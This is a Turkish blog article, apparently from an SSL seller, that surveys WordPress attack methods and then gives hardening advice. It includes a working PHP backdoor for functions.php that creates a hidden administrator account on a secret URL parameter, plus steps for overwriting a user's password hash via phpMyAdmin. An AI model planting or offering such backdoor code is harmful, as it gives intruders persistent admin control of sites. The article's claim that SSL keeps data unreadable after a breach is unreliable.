WordPress Nasıl Hacklenir?

Giriş

Bu makaleye başlamadan önce, bilgisayar korsanlığının yasa dışı olduğunu ve herhangi bir kötü niyetli faaliyeti motive veya teşvik etmediğimizi bilmenizi isteriz. Bu makale yalnızca dolandırıcıların nasıl çalıştığı ve çeşitli site güvenliği yöntemlerinin onları uzak tutmak için ne kadar önemli olduğu hakkında bilgi edinmek içindir. Hadi tartışalım:

• Dolandırıcılar WordPress'i nasıl hackliyor?
• WP sitenizi dolandırıcılardan nasıl korursunuz?

Sözü daha fazla uzatmadan konuya girelim.

WordPress Web Sitesi Çevrimiçi Nasıl Hacklenir?

(Kaynak: wpsecurityninja.com)

WPScan Kullanılıyor:

WPScan, site sahiplerinin WordPress sitelerini güvenlik açıklarına karşı kontrol etmelerine yardımcı olan bir WP güvenlik tarayıcısıdır, ancak bu tarayıcı aynı zamanda bilgisayar korsanları tarafından web sitelerini hackleme amaçlarını yerine getirmek için de kullanılmaktadır.

WPScan, site sahiplerinin ve yöneticilerinin WP kullanıcı hesaplarını ve kaba kuvvet şifrelerini belirlemelerine izin verir ve WP hesaplarına yetkisiz erişim elde etmenin en önde gelen adımıdır.

(WPScan kullanarak kullanıcı adı ve şifreyi zorlayın. Kaynak: Medium)

MIM Saldırıları:

Ortadaki adam (MIM) saldırıları, kullanıcıların benzer LAN'lar kullanması durumunda kolayca gerçekleştirilebilir. Şifrelenmemiş kullanıcı girişleri, tüm ayrıntılar düz metin olarak görülebildiğinden yumuşak bir hedeftir.

Bu tür saldırıları gerçekleştiren yazılımlar, ele geçirilmiş temaları, eklentileri tespit edebilir ve kullanıcıları numaralandırabilir.

(Kaynak: Medium)

SQL Enjeksiyonları:

SQL enjeksiyon saldırıları, web sitelerine sızmak için kullanılan en önemli saldırılar olarak kabul edilir. Bu saldırılar web sitesinin arka uç ağ geçitlerini hedef alır ve bilgisayar korsanlarının ele geçirilmiş komutları uygulayarak bunlara nüfuz etmesine izin verir.

(Kaynak: secure.wphackedhelp.com)

Bu sızmalar ayrıca bilgisayar korsanlarının veritabanlarını ve komutları değiştirmesine ve site bilgilerini silmesine veya çalmasına izin verir.

Bu SQL saldırıları savunmasız ve yamalanmamış siteleri tespit ettiğinden, hackleme görevini kolay ve başarılı hale getirir.

My SQL/cPanel Kullanılıyor:

Bu yöntemde, bilgisayar korsanları sahte bir hesap oluşturur veya mevcut bir WP sitesi kullanıcısının şifresini değiştirir. Hackerlar PhpMyAdmin'i açarak cPanel üzerinden sızmaya çalışırlar. Sonu _users ile biten tabloyu ararlar ve değiştirmek istedikleri kullanıcıyı bulurlar.

Bu, hacklemeyi planladıkları kullanıcının kimlik bilgilerini değiştirmelerine izin verecektir. Kullanıcıyı izlerler ve online MD5 generator açarak kullanıcının şifresini (user_pass alanından) değiştirirler ve aynısını istedikleri ile değiştirirler ve daha sonra # düğmesine tıklarlar.

(Kullanıcı adları, kullanıcıların karma parolaları, e-posta kimlikleri vb. wp_users veritabanı tablosunda saklanır. Kaynak: firstsiteguide.com)

Kullanıcı adları, kullanıcıların karma parolaları, e-posta kimlikleri vb. wp_users veritabanı tablosunda saklanır.

Functions.php düzenleniyor:

Hackerlar ayrıca Functions.php dosyasını değiştirmek için cPanel'e erişirler. Dosya Yöneticisi'nin kilidini açarak aktif temanın klasörünü ararlar. public_html/wp_content/themes klasöründen temayı izler ve ele geçirdikleri kodu yerleştirerek functions.php dosyasını düzenlerler. Bilgisayar korsanları tarafından yeni bir hesap oluşturulduğu için hackleme işlemi halihazırda devam etmektedir. İşlem tamamlandığında, ele geçirilen kodu silerler.

FTP aracılığıyla Yeni Bir Kullanıcı Hesabı Oluşturun:

Genel olarak FTP hesapları, site sahiplerinin sitelerinde belirli kullanıcıların oturum açma kimlik bilgilerini kullanarak dosyalarını yüklemelerine/indirmelerine izin veren bir dizin oluşturmalarına yardımcı olur.

Bu dosyalar internet üzerinden de görüntülenmektedir.

> Sitede FTP Hesabı Oluşturma Adımları: > > - İstediğiniz verileri girin > - Yeni FTP kullanıcısının kullanıcı adını girin > - FTP üzerinden erişim için hesap tahsis etmek üzere şifre girin > - FTP üzerinden erişim sağlamak için dizin adını girin > - Bu klasöre ayırmak istediğiniz MB alanını yazın > - Daha sonra yeni hesabı oluşturmak için "Oluştur " düğmesine basın.

FTP üzerinden erişim sağlamak için aşağıda belirtilen veriler yeni kullanıcı tarafından yüklenmelidir.

Adres / Ana Bilgisayar Adı / Adresi: yourdomain.com veya ftp.yourdomain.com

Kullanıcı / User: [email protected]

Parola: Bu FTP hesabına atanan El parolası

Port: 21 Dosyaların yüklenmesi/indirilmesi için klasörü adlandırın.

Yeni kullanıcı hem seçilen dizinde hem de içerdiği tüm alt dizinlerde okuma ve yazma izinlerine sahip olacaktır.

Örneğin, istemci kullanıcısını oluşturur ve ona / home / user / public_html dizinine erişim izni verirseniz

Arka Kapıdan Girmek:

Siteye nüfuz etmenin kötü niyetli bir yolu arka kapıdır. İster sitenize erişim sağlamak isteyen bir dolandırıcı, ister arka kapı girişi yoluyla sitelerine yeniden erişim sağlamak isteyen kurban kullanıcı olsun, her ikisinin de aşağıdaki adımları izlemesi gerekir.

FTP aracılığıyla yeni bir kullanıcı hesabı oluşturulduğunda veya şifre sıfırlama yapıldığında, ancak istenen sonuçları vermediğinde, kullanıcı arka kapı girişi yoluyla sitelerini hacklemek ve yönetici erişimini geri almak isteyebilir.

Arka Kapı Oluşturma Adımları:

• functions.php dosyasını açın ve aşağıda belirtilen kodu yapıştırın.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Daha sonra değişiklikleri kaydedin.

Crypto Jacking & Cryptocurrency Mining:

Kripto para birimlerinin popülaritesi, kripto para madenciliği kötü amaçlı yazılımı olarak da adlandırılan crypto-jacking gibi yeni siber tehditlerin ortaya çıkmasına neden oldu.

Bir bilgisayara kullanıcının isteği ve bilinci dışında el koyma eylemine kripto kaçırma denir. Crypto-jacking kötü amaçlı yazılımında, dolandırıcılar kullanıcının bilgisayarına, sistemleri ve ağları tehlikeye atmak için yazılım yoluyla gönderilen kötü amaçlı kötü amaçlı yazılım bulaştırır.

Phishing:

Kimlik avı, dolandırıcıların kendilerini tüzel kişi olarak tanıtarak kullanıcıların hassas bilgilerini (giriş bilgileri, sosyal hesap numarası, PIN, kredi kartı bilgileri vb. Amaçlarını gerçekleştirmek için genellikle e-postalara başvururlar.

> Örnek: Bir dolandırıcı kendisini güvenilir bir kaynak olarak tanıtabilir ve arzularını yerine getirmek için kullanıcılardan kişisel veriler toplayabilir. > Ayrıca kimlik avı e-postasına bir kötü bağlantı koyabilir ve kötü amaçlı yazılım sunmak için kullanıcıları bazı hileli sitelere yönlendirebilirler.

Kötü amaçlı yazılım:

WordPress Güvenlik İstatistikleri 4000 WP web sitesine sahte SEO eklentileri nedeniyle kötü amaçlı yazılım bulaştığını göstermektedir.

Dolandırıcıların kötü amaçlı yazılım dağıtmak için bir kaynağa ihtiyacı yoktur. SEO eklentileri, WP temaları ve sitede bulunan diğer birçok faktör, bilgisayar korsanlarını son WP-VCD kötü amaçlı yazılımını kullanmaya motive etti.

Kimlik avı e-postaları bile kötü amaçlı yazılım dağıtmak için birer ağ geçididir.

Burada da hackerların sloganı aynıdır, yani sistemlere sızarak ve bilgi çalarak kullanıcılardan hassas veriler elde etmek.

WordPress Fidye Yazılımı:

WP fidye yazılımında bilgisayar korsanları, kullanıcıların sistemlere ve ağlara erişimini engellemek için kötü amaçlı yazılım kullanır. Aynı şey, bilgisayar korsanı tarafından talep edildiği gibi bir fidye ödeyerek kullanıcı tarafından kurtarılabilir. > Örnek: Petya saldırısı, burada bilgisayar korsanı dosyalarınızı ve verilerinizi şifreler ve şifre çözme anahtarı karşılığında fidye talep eder.

Siteler Arası Komut Dosyası Yazma (XSS) Saldırısı:

XSS saldırıları, bilgisayar korsanları tarafından web sitesine kötü amaçlı içerik enjekte edilerek gerçekleştirilir ve böylece tarayıcı istismar edilir. Bu saldırı, bilgisayar korsanının çerezlerden veri çalmasına, site içeriğini değiştirmesine ve hassas verileri elde etmek için web sitesini ele geçirmesine izin verir.

Clickjacking:

Clickjacking'de bilgisayar korsanı bir düğmeyi/bağlantıyı ele geçirmek için kötü niyetli bir girişimde bulunur ve kullanıcıyı ele geçirilen nesneye tıklaması için motive eder. Bu, bilgisayar korsanının kullanıcıya duyarlı verilere erişim elde etmek için kötü amaçlı komutlar yürütmesine izin verir.

Spoofing:

Spoofing, kişinin kullanıcıdan yasadışı fayda sağlamak ve gizli bilgilerini göndermesi için onları kandırmak amacıyla kendisini güvenilir bir kimlik olarak gizlediği bir saldırıdır.

Tüm bu bilgisayar korsanlığı saldırılarını önlemek için WP web sitenizin güvenliğini sağlamak üzere belirli güvenlik önlemlerinin alınması gerekir.

WordPress Web Sitesi Hacklenmeye Karşı Nasıl Korunur?

(Kaynak: envisagedigital.co.uk)

Yukarıdaki istatistikler WordPress'in popülerliğini göstermek için yeterlidir. Bu popülerlik, bu CMS platformunu, WP web sitelerine ve verilerine erişmek için çeşitli hackleme yöntemleri deneyen bilgisayar korsanları arasında daha cazip hale getirmektedir.

Bu nedenle, bilgisayar korsanlarının WP sitenize erişmesini nasıl önleyeceğinizi bilmek çok önemlidir.

WP sitenizi SSL Sertifikası ile güvence altına alın:

Siteye herhangi bir veri yüklendiğinde, bu veriler her zaman bilgisayar korsanları da dahil olmak üzere herkes tarafından kolayca görülebilen düz metin halinde olur. Bilgisayar korsanları site verilerinizi kötüye kullanabileceğinden bu riskli olabilir.

SSL (Secure Socket Layers) sertifikaları, WP sitenizi 256 bit şifreleme güvenliği ile güvence altına almaya yardımcı olan ve böylece site verilerinizi kodlanmış bir biçime dönüştüren dijital sertifikalardır.

Hackerlar sitenize erişim sağlamış olsalar bile kodları okuyamazlar ve bu nedenle bu tür siteleri terk etmek zorunda kalırlar.

(Kaynak: clickssl.net)

İstediğiniz SSL sertifikası markasını seçin (Comodo, Thawte, RapidSSL, vb.) ve aynısını WP sitenize yükleyin. SSL sertifikasının türü söz konusu olduğunda, alan adlarını ve alt alan adlarını anlamanız gerekir. Örneğin, WP sitenizde alt alan adları varsa, yaklaşık olarak sadece $45/yıl maliyetli tek bir ucuz Wildcard Sertifikası tüm dijital işinizi güvence altına alabilir.

Hızlı düzenleme, 2048-bit anahtar şifreleme, SEO'da artış, site güven mührü, %99 tarayıcı/mobil uyumluluğu, geri ödeme politikası ve garanti Wildcard SSL sertifikaları kurmanın özelliklerinden ve avantajlarından birkaçıdır.

SSL ürünlerinin çeşitli markaları ve seçenekleri, bütçe dostu fiyatlar ve mükemmel müşteri hizmetleri, WP sitenizi güvence altına almak için ClickSSL mağazasına yaklaşmanın avantajlarından birkaçıdır.

Çalışanlarınızı güncelleyin:

İnsan hataları felakete yol açabilir, bu nedenle çalışanlarınızın savunmasız kalmasını önlemek için her zaman en son siber tehditler hakkında güncel bilgiler verdiğinizden emin olun.

Çalışanlarınız saldırıya uğramış bir web sitesinin şüpheli sinyallerini ilk aşamada izleyebilirse, ilgilileri bilgilendirebilir ve sitenizin ve işletmenizin daha fazla zarar görmesini önleyebilir.

İki Faktörlü Kimlik Doğrulama (2FA) kullanın:

Siteye giriş sırasında 2FA uygulamak, kaba kuvvet saldırılarını önlemenin en önemli yoludur. Başka bir güvenlik katmanı eklemenin yanı sıra, site ve kullanıcı verilerini de önler.

Bunun nedeni, bir güvenlik katmanı tehlikeye girerse, dolandırıcının web sitesine erişim sağlamak için 2. katmanı istila etmesi gerektiğidir.

Bu zor bir karardır ve bu nedenle vakaların çoğunda, dolandırıcılar diğer zayıf güvenlikli sitelere geçmektedir.

> İpucu: WP 2FA, WP sitenize ek bir güvenlik katmanı sağlayan ücretsiz bir WP eklentisidir.

Yönetici Kullanıcıları Düzenli Olarak Denetleyin:

Bu, WP sitenizin güvenliği için önemlidir. Yönetici kullanıcılarınızı düzenli olarak denetlediğinizden ve erişimlerini çapraz kontrol ettiğinizden emin olun.

Ayrıca, güvenlik açıklarını önlemek için çalışanlarınızın yanı sıra kullanıcılarınızın da görevlerine göre sınırlı erişime sahip olduğundan emin olun.

WordPress Çekirdeğini Düzenli Olarak Güncelleyin:

WP Core hakkında bilginiz yok mu?

WP Core'un, WP'nin çalışması için gereken tüm temel dosyaları içerdiğini belirtmeme izin verin.

WordPress.org'dan indirilen WP zip dosyasındaki dosya listesi

(Kaynak: ithemes.com)

Bu çekirdek dosyaların, tüm güvenlik açıklarını gidermek için güvenlik güncellemelerinin yayınlanmasından sonra düzenli olarak güncellenmesi gerekir.

WP Temalarını ve Eklentilerini Güvenilir Kaynaklardan İndirin:

Bu çok önemlidir çünkü eklentiler güncellenmediklerinde veya güvenilir olmayan kaynaklardan yüklendiklerinde tehdit edici olabilirler. Ücretsiz/ücretli eklentilerin kullanılması durumunda, her zaman aşağıda belirtilen faktörleri kontrol edin:

• Kullanıcı puanları ve değerlendirmeleri
• Kullanıcı dostu
• Uyumluluk
• Güvenlik
• Güvenilirlik

(Kaynak: torquemag.io)

Aynı kural WP temalarını yüklemek için de geçerlidir.

WP Temalarını ve Eklentilerini Düzenli Olarak Güncelleyin:

Eski veya süresi dolmuş WP temaları ve eklentileri, güvenlik standartlarını kaybettikleri için WP siteniz için her zaman bir tehdit oluşturur. Bilgisayar korsanlarının siteye erişim sağlamak amacıyla kötü amaçlı yazılım yaymak için bu tür ağ geçitlerini kullanmasını önlemek için WP sitenizde kullanılan temaları ve eklentileri düzenli olarak güncellediğinizden emin olun.

Bu, eklentinin düzgün çalışmasına ve WP'nin en son sürümleriyle senkronize kalmasına yardımcı olacaktır.

> İpucu: Eklentiler sayfasında, yüklü tüm eklentileri ve her eklentinin yanında "Otomatik güncellemeleri etkinleştir" yazan bir bağlantıyı görüntüleyebilirsiniz. Otomatik güncellemeler için bunu açın.

Varsayılan Yönetici Adını Değiştirin:

Bilgisayar korsanları çok akıllıdır ve varsayılan yönetici adını kullanarak WP sitenize kolayca sızabilirler. Bilgisayar korsanlarının web sitenize yetkisiz erişim elde etmek için kaba kuvvet saldırıları gerçekleştirmesini önlemek için varsayılan yönetici kullanıcı adını değiştirmek her zaman tercih edilir.

Sınırlı Erişim Verin:

Asla gerekenden fazlasını vermeyin ve aynı kural kullanıcılara ve çalışanlara site erişimi vermek için de geçerlidir.

Erişim kontrolü, web sitesine kimin erişebileceğini veya erişemeyeceğini tanımladığı için site ve veri güvenliğinin en önde gelen kuralıdır. Site güvenliği için WP admin ve diğer kritik kod ve verilere tüm girişleri engelleyin.

Sınırlı erişim yalnızca üretkenliği artırmakla kalmaz, aynı zamanda sitenizi kötü niyetli girişlere karşı korur.

WordPress'i güncelleyin:

WordPress'iniz güncellenmediğinde, siteniz bilgisayar korsanları tarafından istila edilme riski altındadır.

Pazar payının %37'sine sahip olan WordPress, güvenlik açıklarını ve hataları gidermek için düzenli olarak güncellemeler yayınlamaya devam ediyor. Bu güncellemeler aynı zamanda sitenizin performansını artırmak için yararlı olan yeni özellikler ve mevcut özelliklerin iyileştirilmesini de içerir.

(Kaynak: wpbeginner.com)

Sağlam güvenlik için WP sitenizi güncel tutun.

Toparlıyorum:

Güçlü ve karmaşık parolalar kullanın ve tüm güvenlik açıklarını gidermek için WP sitenizin yanı sıra eklentileri ve temaları güncel tutun. Felaketleri önlemede her zaman yardımcı olacağından çalışanlarınızı eğitmek için zaman ayırın.

Güvenlik konusunda asla gevşemeyin ve WP sitenizi meraklı gözlerden korumak için her zaman en iyi ve güvenilir güvenlik eklentilerini kullandığınızdan emin olun. Ayrıca, müşteri güvenini, işinizi ve SEO'yu geliştirmek için sitenizi SSL ile güvence altına alın.

Artık bilgisayar korsanlarının nasıl çalıştığını bildiğinize göre, bu makalenin bilgisayar korsanlarının sitenize girmesini önlemenize ve WP sitenizi güvenli bir şekilde yönetmenize yardımcı olacağını umuyoruz.